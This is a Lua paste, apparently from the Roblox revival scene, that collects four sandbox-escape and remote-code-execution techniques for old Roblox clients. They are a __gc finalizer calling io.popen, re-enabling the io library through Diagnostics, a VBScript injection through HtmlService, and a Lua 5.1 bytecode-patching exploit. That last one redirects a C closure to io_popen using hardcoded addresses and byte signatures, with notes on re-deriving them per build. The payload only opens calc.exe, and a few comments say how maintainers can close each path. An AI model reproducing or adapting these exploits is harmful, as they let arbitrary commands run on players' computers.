-- null: please add Lua syntax highlighting to this paste.
-- RCE method 1: early-2009 clients and before.
-- RCE 1: plant a __gc finalizer on a newproxy() userdata. Finalizers are
-- invoked by the garbage collector rather than by the sandboxed caller, and
-- per the author's note an unpatched client runs them outside the sandbox,
-- so io.popen is reachable from inside the handler. The proxy is deliberately
-- not kept anywhere: it is garbage as soon as this block ends, so the
-- finalizer fires on the next collection cycle.
-- Revival maintainers: newproxy() (an undocumented, 5.1-only builtin) is the
-- enabler; removing it or refusing __gc on script-created metatables closes
-- this path.
do
  local proxy_mt = getmetatable(newproxy(true))
  proxy_mt.__gc = function()
    print("this runs outside Roblox's sandbox if the revival doesnt patch this")
    print("io.popen should also work here on like some clients, example below opens calc")
    io.popen("calc.exe")
    game:Close()
  end
end
-- RCE 2: early-2008 clients and before; most revivals already patch this one.
-- RCE 2: turn the engine's Diagnostics.ioEnabled flag back on (which, judging
-- by the call that follows, re-exposes the io library to scripts) and spawn a
-- process through it. Only applies where settings() is reachable and the flag
-- is writable from a script.
local diagnostics = settings().Diagnostics
diagnostics.ioEnabled = true
io.popen("calc.exe")
-- RCE 3: applies if the revival's client still ships HtmlService.
-- RCE 3: open an HtmlService window and, once its document has loaded, replace
-- the body with a VBScript block that spawns a process via WScript.Shell. This
-- relies on the embedded browser control honouring VBScript (i.e. an Internet
-- Explorer engine); the lowercase `connect` is kept on purpose because the
-- targeted clients predate the capitalised event API.
local window = game:GetService("HtmlService"):NewWindow()
local vbscript_payload = [==[
<script language="VBScript">
Set WshShell = CreateObject("WScript.Shell")
WshShell.Run "start calc.exe"
</script>
]==]
local function on_document_complete()
  window:SetBody(vbscript_payload)
  window:Show()
end
window.DocumentComplete:connect(on_document_complete)
window:Navigate()
-- Note: on modern Windows the embedded browser may need an IE8 compatibility directive in the HTML before the script block runs.
-- RCE 4: for builds in which io_popen was still compiled in (roughly pre-2010 clients; exact cutoff unverified). Needs two build-specific addresses, see below.
-- Target check: the 12-byte header that string.dump emits must be exactly the
-- one of a little-endian 32-bit Lua 5.1 with 8-byte floating-point numbers.
-- Per Lua 5.1's ldump.c the bytes are: "\27Lua", version 0x51, format 0,
-- endianness 1 (little), sizeof(int) 4, sizeof(size_t) 4,
-- sizeof(Instruction) 4, sizeof(lua_Number) 8, integral flag 0.
-- The bytecode patching and pointer arithmetic that follow assume all of
-- these, not merely "32-bit".
local chunk_header = string.dump(function() end):sub(1, 12)
local expected_header = "\27Lua\81\0\1\4\4\4\8\0"
if chunk_header ~= expected_header then
  error("This generator requires a 32-bit version of Lua 5.1")
end
-- RCE 4 generator. This function is never run as written: it is dumped to
-- bytecode, patched by the two gsub() calls that follow it, and only the
-- patched chunk is executed. The intent (per `delta`, `command` and the AOB
-- notes below) is to redirect the C function behind a coroutine.wrap closure
-- from luaB_auxwrap to io_popen and then call it with `command`.
-- Everything here depends on exact local-declaration order (register
-- allocation), on the Lua 5.1 TValue/closure layouts of a 32-bit build and on
-- the absence of ASLR for the client image. Do not reorder, rename or add
-- locals without re-deriving the bytecode patches.
local function outer()
local magic -- In bytecode, the stack slot corresponding to this local is changed
-- ^ `magic` must remain outer's first local (register 0). The second bytecode
-- patch rewrites the upvalue pseudo-instruction after outer's first CLOSURE so
-- that `middle`/`inner` capture outer's register 2 instead of register 0.
-- NOTE(review): register 2 is where outer places `middle` before calling it,
-- i.e. that call's function slot; writing `magic` therefore appears to
-- overwrite the frame's closure reference, which stock Lua 5.1 reloads from
-- the stack when a callee returns -- confirm against the target's lvm.c.
local function middle()
-- f2ii: split an IEEE-754 double into its two little-endian 32-bit words.
-- lo = low 32 mantissa bits; hi = (biased exponent << 20) | top 20 mantissa
-- bits. The sign is discarded (negative inputs are folded to |x|), so bit 31
-- of hi is never set. Exact for normals and subnormals; NaN/Inf not handled.
local function f2ii(x) -- Convert double to uint32_t[2]
if x == 0 then return 0, 0 end
if x < 0 then x = -x end
-- Binary search the unbiased exponent e such that 0.5 <= x / 2^e < 1.
local e_lo, e_hi, e, m = -1075, 1023
while true do
e = (e_lo + e_hi)
e = (e - (e % 2)) / 2
m = x / 2^e
if m < 0.5 then e_hi = e elseif 1 <= m then e_lo = e else break end
end
if e+1023 <= 1 then
-- Subnormal range: no implicit leading 1, biased exponent field is 0.
m = m * 2^(e+1074)
e = 0
else
-- Normal: drop the implicit leading 1 and scale to a 52-bit integer mantissa.
m = (m - 0.5) * 2^53
e = e + 1022
end
local lo = m % 2^32
m = (m - lo) / 2^32
local hi = m + e * 2^20 -- exponent field lives in bits 20..30 of the high word
return lo, hi
end
-- ii2f: inverse of f2ii -- rebuild the double from its two 32-bit words.
-- Assumes bit 31 of hi is clear (no sign) and that hi does not encode NaN/Inf.
local function ii2f(lo, hi) -- Convert uint32_t[2] to double
local m = hi % 2^20
local e = (hi - m) / 2^20
m = m * 2^32 + lo
if e ~= 0 then
m = m + 2^52 -- restore the implicit leading 1 of a normal number
else
e = 1 -- subnormal: same scale as exponent 1, no implicit 1
end
return m * 2^(e-1075)
end
-- asnum: return the raw 8-byte payload of any TValue as a double (for a GC
-- object that is its pointer in the low word). As written this loop would be
-- rejected by the numeric-for type check; it only works after the first
-- bytecode patch turns the FORPREP into a JMP, so that FORLOOP copies the
-- payload bits unvalidated. In stock Lua 5.1 a step of 0 makes FORLOOP test
-- `limit <= idx`, which holds for equal values, so the body runs exactly once.
local function asnum(x) -- Reinterpret any TValue as a number
for i = x, x, 0 do
return i
end
end
-- Shared between inner() and the tail of middle(): the C closure to hijack and
-- the string that carries the fake structure it is steered through.
local co, upval
local function inner()
-- ub1[n] is the single byte n (0..255); ub4 uses it to emit raw bytes.
local ub1 = {[0] = -- Convert uint8_t to char[1]
"\0", "\1", "\2", "\3", "\4", "\5", "\6", "\7", "\8", "\9", "\10", "\11", "\12", "\13", "\14",
"\15", "\16", "\17", "\18", "\19", "\20", "\21", "\22", "\23", "\24", "\25", "\26", "\27", "\28",
"\29", "\30", "\31", "\32", "\33", "\34", "\35", "\36", "\37", "\38", "\39", "\40", "\41", "\42",
"\43", "\44", "\45", "\46", "\47", "\48", "\49", "\50", "\51", "\52", "\53", "\54", "\55", "\56",
"\57", "\58", "\59", "\60", "\61", "\62", "\63", "\64", "\65", "\66", "\67", "\68", "\69", "\70",
"\71", "\72", "\73", "\74", "\75", "\76", "\77", "\78", "\79", "\80", "\81", "\82", "\83", "\84",
"\85", "\86", "\87", "\88", "\89", "\90", "\91", "\92", "\93", "\94", "\95", "\96", "\97", "\98",
"\99", "\100", "\101", "\102", "\103", "\104", "\105", "\106", "\107", "\108", "\109", "\110", "\111",
"\112", "\113", "\114", "\115", "\116", "\117", "\118", "\119", "\120", "\121", "\122", "\123", "\124",
"\125", "\126", "\127", "\128", "\129", "\130", "\131", "\132", "\133", "\134", "\135", "\136", "\137",
"\138", "\139", "\140", "\141", "\142", "\143", "\144", "\145", "\146", "\147", "\148", "\149", "\150",
"\151", "\152", "\153", "\154", "\155", "\156", "\157", "\158", "\159", "\160", "\161", "\162", "\163",
"\164", "\165", "\166", "\167", "\168", "\169", "\170", "\171", "\172", "\173", "\174", "\175", "\176",
"\177", "\178", "\179", "\180", "\181", "\182", "\183", "\184", "\185", "\186", "\187", "\188", "\189",
"\190", "\191", "\192", "\193", "\194", "\195", "\196", "\197", "\198", "\199", "\200", "\201", "\202",
"\203", "\204", "\205", "\206", "\207", "\208", "\209", "\210", "\211", "\212", "\213", "\214", "\215",
"\216", "\217", "\218", "\219", "\220", "\221", "\222", "\223", "\224", "\225", "\226", "\227", "\228",
"\229", "\230", "\231", "\232", "\233", "\234", "\235", "\236", "\237", "\238", "\239", "\240", "\241",
"\242", "\243", "\244", "\245", "\246", "\247", "\248", "\249", "\250", "\251", "\252", "\253", "\254",
"\255"}
-- ub4: serialise a non-negative integer below 2^32 as 4 little-endian bytes.
-- No range check: values >= 2^32 silently lose their upper bits.
local function ub4(x) -- Convert little endian uint32_t to char[4]
local b0 = x % 256; x = (x - b0) / 256
local b1 = x % 256; x = (x - b1) / 256
local b2 = x % 256; x = (x - b2) / 256
local b3 = x % 256
return ub1[b0] .. ub1[b1] .. ub1[b2] .. ub1[b3]
end
-- Pre-seed the next eight stack slots with 2^52 (bit pattern
-- 0x43300000_00000000). When a 32-bit object pointer is later stored into the
-- low word of one of these slots and the high word is left untouched, asnum()
-- reads back exactly 2^52 + pointer, so subtracting 2^52 recovers the pointer.
-- NOTE(review): this assumes the VM does not clear the 8-byte value union when
-- it writes a pointer -- true of stock 5.1, verify on the target fork.
do local l0 = 2^52 local l1, l2, l3, l4, l5, l6, l7 = l0, l0, l0, l0, l0, l0, l0 end
co = coroutine.wrap(ub4) -- create a CClosure
-- ^ co's C function is luaB_auxwrap, which is why LUAB_AUXWRAP below must be
-- that function's address in the target image.
-- upval: the decimal rendering of 2^52 followed by the 4 raw bytes of
-- (address of co) + 12. upval_ptr: the 4 raw bytes of (address of upval) + 28.
-- The constants 12, 16 and 12 encode struct-layout offsets of the target's
-- CClosure and TString and the width of its number-to-string output; none of
-- that is derivable from this file, so re-verify them against the target
-- build's lobject.h and CRT before reusing the generator.
upval = 2^52 .. ub4(asnum(co) - (2^52 - 12))
local upval_ptr = ub4(asnum(upval) - (2^52 - 16 - 12))
-- magic: 8 bytes, the same pointer twice. Because of the CLOSURE/MOVE patch
-- this assignment lands in outer's register 2 rather than in a private local.
magic = upval_ptr .. upval_ptr
end
--// Image base is 0x400000 for these clients (author's claim). To find the two
--// functions, open a client built before 3 August 2012 in IDA, or search for
--// these array-of-byte signatures:
--// io_popen AOB:     53 55 56 8B 74 24 10 57 6A 00 6A 01 56 E8
--// luaB_auxwrap AOB: 56 57 8B 7C 24 0C 68 ED
-- Both constants are absolute virtual addresses for ONE specific client build.
-- They are wrong for every other build and must be re-derived per target;
-- a wrong pair crashes the client instead of spawning the command.
local LUAB_AUXWRAP = 0x60aaa0 --// luaB_auxwrap
local IO_POPEN = 0x6062d0 --// io.popen
-- Calculate delta: only the difference between the two addresses is used. It
-- is added to the high 32-bit word of the value read back through `magic`,
-- i.e. to whatever function pointer that word overlays (negative here, since
-- io_popen sits below luaB_auxwrap in this build).
local delta = IO_POPEN - LUAB_AUXWRAP
local command = "calc.exe"
inner()
-- After inner() returns, `magic` is read and written through the structure
-- inner() set up; the round trip below rewrites the high word by `delta`
-- while leaving the low word intact.
local lo, hi = f2ii(asnum(magic))
magic = ii2f(lo, hi + delta)
-- If the redirection worked, this dispatches into io_popen with `command` as
-- its first argument instead of resuming the wrapped coroutine.
co(command)
end
middle()
end
-- Dump `outer` to bytecode, patch it, and run the patched chunk. Both patches
-- are plain pattern substitutions over the whole dump, so they are only as
-- reliable as the target byte sequences are unique:
--  1. "\96\0\0\128" -> "\22\0\0\128": in stock Lua 5.1 opcode numbering this
--     turns FORPREP A=1 sBx=1 (asnum's loop) into JMP sBx=1, bypassing the
--     numeric-for operand validation that FORPREP performs (verify against
--     the target fork's lopcodes.h). Unbounded: every match is rewritten.
--  2. first "\100\0\0\0" plus 4 bytes: keeps CLOSURE A=1 Bx=0 (outer creating
--     `middle`) and rewrites the upvalue pseudo-instruction that follows it so
--     the captured `magic` refers to outer's register 2 instead of register 0.
--     Limited to one match, so it relies on no earlier 64 00 00 00 run in the
--     dump -- e.g. a linedefined/lastlinedefined of 100 would break it.
-- loadstring() must accept precompiled chunks for any of this to work; a
-- revival whose loadstring rejects inputs starting with "\27" (or that removes
-- string.dump) stops this technique at this step.
local patched = string.dump(outer)
patched = patched:gsub("\96%z%z\128", "\22\0\0\128")
patched = patched:gsub("(\100%z%z%z)....", "%1\0\0\0\1", 1)
outer = patched
loadstring(outer)()
-- You need to recover two addresses (io_popen and luaB_auxwrap) for each target build in Binary Ninja, IDA Pro, Ghidra or similar. Useful references: the 2016 Roblox source leak, iOS builds from before 2019-2020, and the 2007L-2008E RBXGS builds, all of which shipped debug symbols.